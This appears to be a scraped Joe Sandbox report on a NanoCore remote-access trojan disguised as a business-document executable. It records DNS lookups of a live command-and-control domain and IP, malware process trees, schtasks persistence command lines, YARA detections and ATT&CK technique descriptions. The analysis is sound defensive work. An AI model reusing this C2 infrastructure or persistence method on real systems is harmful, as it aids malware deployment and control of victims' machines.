Feb 23, 2021 08:05:23.629424095 CET	192.168.2.4	8.8.8.8	0xf1f9	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:05:33.698035002 CET	192.168.2.4	8.8.8.8	0xdcab	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:05:38.525880098 CET	192.168.2.4	8.8.8.8	0xcf5b	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:05:43.667853117 CET	192.168.2.4	8.8.8.8	0x6fec	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:05:51.198170900 CET	192.168.2.4	8.8.8.8	0x63c7	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:05:58.879259109 CET	192.168.2.4	8.8.8.8	0xd0e	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:00.162163019 CET	192.168.2.4	8.8.8.8	0xd0e	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:05.252437115 CET	192.168.2.4	8.8.8.8	0x275e	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:12.445050955 CET	192.168.2.4	8.8.8.8	0xc083	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:19.625576973 CET	192.168.2.4	8.8.8.8	0xdff8	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:24.408164978 CET	192.168.2.4	8.8.8.8	0x287f	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:30.400244951 CET	192.168.2.4	8.8.8.8	0x35f1	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:39.258706093 CET	192.168.2.4	8.8.8.8	0x5d41	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:44.260832071 CET	192.168.2.4	8.8.8.8	0x693d	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:51.366480112 CET	192.168.2.4	8.8.8.8	0x3f83	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Feb 23, 2021 08:05:03.453761101 CET	8.8.8.8	192.168.2.4	0x53b8	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:05:11.147933960 CET	8.8.8.8	192.168.2.4	0x4403	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:05:18.338680983 CET	8.8.8.8	192.168.2.4	0x57a4	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:05:23.689316034 CET	8.8.8.8	192.168.2.4	0xf1f9	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:05:33.755517006 CET	8.8.8.8	192.168.2.4	0xdcab	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:05:38.583254099 CET	8.8.8.8	192.168.2.4	0xcf5b	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:05:43.728954077 CET	8.8.8.8	192.168.2.4	0x6fec	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:05:51.256272078 CET	8.8.8.8	192.168.2.4	0x63c7	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:00.224046946 CET	8.8.8.8	192.168.2.4	0xd0e	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:05.311299086 CET	8.8.8.8	192.168.2.4	0x275e	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:12.502271891 CET	8.8.8.8	192.168.2.4	0xc083	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:19.688391924 CET	8.8.8.8	192.168.2.4	0xdff8	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:24.466933966 CET	8.8.8.8	192.168.2.4	0x287f	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:30.457842112 CET	8.8.8.8	192.168.2.4	0x35f1	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:39.310410976 CET	8.8.8.8	192.168.2.4	0x5d41	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:44.322439909 CET	8.8.8.8	192.168.2.4	0x693d	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:51.427912951 CET	8.8.8.8	192.168.2.4	0x3f83	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 7052 Parent PID: 5924

General

Start time:	08:04:47
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe'
Imagebase:	0xa70000
File size:	520704 bytes
MD5 hash:	589F3EDCF4BCCADDE074ACC68279CAB1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.672841127.0000000002E21000.00000004.00000001.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.673686712.000000000408C000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.673686712.000000000408C000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000002.673686712.000000000408C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.672967750.0000000002EA8000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: schtasks.exe PID: 64 Parent PID: 7052

General

Start time:	08:04:58
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sjZXfoyePbSa' /XML 'C:\Users\user\AppData\Local\Temp\tmp66DE.tmp'
Imagebase:	0xbc0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 6060 Parent PID: 64

General

Start time:	08:04:58
Start date:	23/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 5980 Parent PID: 7052

General

Start time:	08:04:59
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe
Imagebase:	0x9a0000
File size:	520704 bytes
MD5 hash:	589F3EDCF4BCCADDE074ACC68279CAB1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: NanoCore, Description: unknown, Source: 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Analysis Process: dhcpmon.exe PID: 6848 Parent PID: 3424

General

Start time:	08:05:12
Start date:	23/02/2021
Path:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Imagebase:	0xb50000
File size:	520704 bytes
MD5 hash:	589F3EDCF4BCCADDE074ACC68279CAB1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000002.726986309.000000000410C000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.726986309.000000000410C000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000008.00000002.726986309.000000000410C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000008.00000002.724064551.0000000002F28000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000008.00000002.723420263.0000000002EA1000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Analysis Process: schtasks.exe PID: 6056 Parent PID: 6848

General

Start time:	08:05:18
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sjZXfoyePbSa' /XML 'C:\Users\user\AppData\Local\Temp\tmpAD4D.tmp'
Imagebase:	0xbc0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 4112 Parent PID: 6056

General

Start time:	08:05:18
Start date:	23/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: dhcpmon.exe PID: 6052 Parent PID: 6848

General

Start time:	08:05:19
Start date:	23/02/2021
Path:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Imagebase:	0x960000
File size:	520704 bytes
MD5 hash:	589F3EDCF4BCCADDE074ACC68279CAB1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.739875552.0000000002D61000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.739875552.0000000002D61000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.737080835.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.737080835.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.737080835.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.739970896.0000000003D69000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.739970896.0000000003D69000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Disassembly

Code Analysis

Reset < >

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe	Binary or memory string: OriginalFilename vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.672841127.0000000002E21000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAsyncState.dllF vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000000.644771334.0000000000A72000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameDllImportAttribute.exe6 vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.683010152.0000000008E50000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.673275286.0000000003E29000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameLegacyPathHandling.dllN vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.682842531.00000000078B0000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.682842531.00000000078B0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.682775194.0000000007850000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000000.670782996.00000000009A2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameDllImportAttribute.exe6 vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameCoreClientPlugin.dll8 vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameManagementClientPlugin.dll4 vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameNanoCoreBase.dll< vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameFileBrowserClient.dllT vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameMyClientPlugin.dll4 vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameMyClientPlugin.dll@ vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameNanoCoreStressTester.dll< vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameNetworkClientPlugin.dll4 vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSecurityClientPlugin.dll4 vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAForge.Video.DirectShow.dll4 vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameNAudio.dll4 vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSurveillanceClientPlugin.dll4 vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameToolsClientPlugin.dll4 vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe	Binary or memory string: OriginalFilenameDllImportAttribute.exe6 vs COMPANY PROFILE AND DOCUMENTED OFFER.exe

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report COMPANY PROFILE AND DOCUMENTED OFFER.scr

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: NanoCore

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre